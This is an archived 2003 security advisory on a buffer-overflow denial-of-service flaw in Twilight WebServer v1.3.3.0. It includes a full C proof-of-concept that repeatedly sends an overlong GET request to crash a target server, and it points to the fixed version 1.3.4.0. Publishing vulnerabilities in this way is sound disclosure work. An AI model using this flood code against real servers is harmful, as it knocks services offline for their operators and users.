TUCoPS :: Web :: Servers :: bt619.txt

Twilight WebServer v1.3.3.0 Denial of Service Attack


--------------060901050600060204080404
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit



--------------060901050600060204080404
Content-Type: text/plain;
 name="twilight_webserver_advisory.txt"
Content-Transfer-Encoding: 8bit
Content-Disposition: inline;
 filename="twilight_webserver_advisory.txt"

TA-2003-07 Denial of Service Attack against Twilight WebServer 1.3.3.0 
contributed by: rushjo
====================================================================================== 
Tripbit Security Advisory 

TA-2003-07 Denial of Service Attack against Twilight WebServer v1.3.3.0 
====================================================================================== 


PROGRAM: Twilight WebServer v1.3.3.0  
HOMEPAGE: http://www.twilightutilities.com
NOT VULNERABLE VERSIONS: v1.3.4.0    
RISK: Medium 
IMPACT: Denial of Service Attack  
RELEASE DATE: 2003-07 


====================================================================================== 
TABLE OF CONTENTS 
====================================================================================== 


1..........................................................DESCRIPTION 
2..............................................................DETAILS 
3..............................................................EXPLOIT 
4............................................................SOLUTIONS 
5........................................................VENDOR STATUS 
6..............................................................CREDITS 
7...........................................................DISCLAIMER 
8...........................................................REFERENCES 
9.............................................................FEEDBACK 


1. DESCRIPTION 
====================================================================================== 


"We are excited to present this completely new Modem Ready Internet Web Server 
supporting these terrific features. 

* Installs in seconds
* Lets you INSTANTLY share pictures and files
* Modem aware
* Automates telling friends and family when you start serving
* Automatically integrates your web camera
* Allows others to send files to you
* Automatically generates web pages
* Supports file resume
* A truely unique files-sharing tool"

(This description is taken from the website of Twilight Ultilities)
 

2. DETAILS 
====================================================================================== 


¤ Remote DoS : 


A security vulnerability in Twilight WebServer allows remote 
attackers to crash the server by sending two an too long "get Request". 


3. EXPLOIT 
====================================================================================== 


This is an Proof of Concept Exploit of this Buffer Overflow Vul-
nerability. 


NOTE: This is only for INFORMATION purposes and not for any 
      destructive acts!


/****************************************************************************
* 	Title: Denial of Service Attack against Twilight Webserver v1.3.3.0
*	Author: posidron
*
*	Date: 2003-07-07
*	Reference: http://www.twilightutilities.com
*	Version: Twilight Webserver v1.3.3.0
*	Related Info: http://www.tripbit.org/advisories/twilight_advisory.txt
*	
*	Exploit: twilight.c
*	Compile: gcc twilight -o twilight
*	
*	Tripbit Security Development
*
*	Contact
*	[-] Mail: posidron@tripbit.org
*	[-] Web: http://www.tripbit.org
*	[-] IRC: irc.euirc.net 6667 #tripbit
*
* 	Program received signal SIGSEGV, Segmentation fault.
*	0x41d780 in ?? ()
*****************************************************************************/

#include <stdio.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>

int main(int argc, char *argv[])
{
	int sockfd;
	struct sockaddr_in srv;
	struct hostent *host;
	char send[1052], *flood[1037], get[3] = "GET", http[12] = "HTTP/1.0\r\n";

	memset(flood, 0x41, 1037);
	
	strncpy(send, get, sizeof(send) -1);
	strncat(send, flood, sizeof(send) - strlen(send) -1);
	strncat(send, http, sizeof(send) - strlen(send) -1);
	
	if(argc < 3)
	{ 
		printf("Usage: %s [target] <port>\n", argv[0]); 
		exit(0); 
	}

	if((host = gethostbyname(argv[1])) == NULL)
	{	
		printf("Unknown host!\n"); 
		exit(0); 
	}
	
	srv.sin_family = AF_INET;
	srv.sin_port = htons(atoi(argv[2]));
	srv.sin_addr.s_addr = inet_addr((char*)argv[1]);

	printf("DoS against Twilight Webserver v1.3.3.0\n");

	for(;;)
	{
		if( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
		{ 
			printf("Can't start socket()!\n"); exit(0); 
		}
	
		if(connect(sockfd,(struct sockaddr*)&srv, sizeof(srv)) < 0)
		{ 
			printf("Connection to server broken!\n"); close(sockfd); 
		}
	
		if(write(sockfd, send, strlen(send)) < 0)
		{ 
			break;
		}
	
		close(sockfd);
	}
	
	printf("Attack done!...\n");
	
	return 0;
}



This error causes an "crash" of the Twilight WebServer v1.3.3.0.



4. SOLUTIONS 
================================================================================ 


Upgrade your Twilight WebServer to the new fixed version v.1.3.4.0. This version
is avaible at http://www.twilightutilities.com. 



5. VENDOR STATUS 
================================================================================ 


The vendor has reportedly been notified. He didn't answer to your report but
NOW there is an new fixed version avaible for download. 



6. CREDITS 
================================================================================ 


Discovered by posidron 



7. DISLAIMER 
====================================================================== 


The information within this paper may change without notice. Use of 
this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. In no event 
shall the author be liable for any damages whatsoever arising out of 
or in connection with the use or spread of this information. Any use 
of this information is at the user's own risk. 



8. REFERENCES 
====================================================================== 


- Original Version: 
http://www.tripbit.org


9. FEEDBACK 
====================================================================== 


Please send suggestions, updates, and comments to: 


Tripbit Security Advisory 
http://www.tripbit.org 
rushjo@tripbit.org
posidron@tripbit.org 




--------------060901050600060204080404--

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH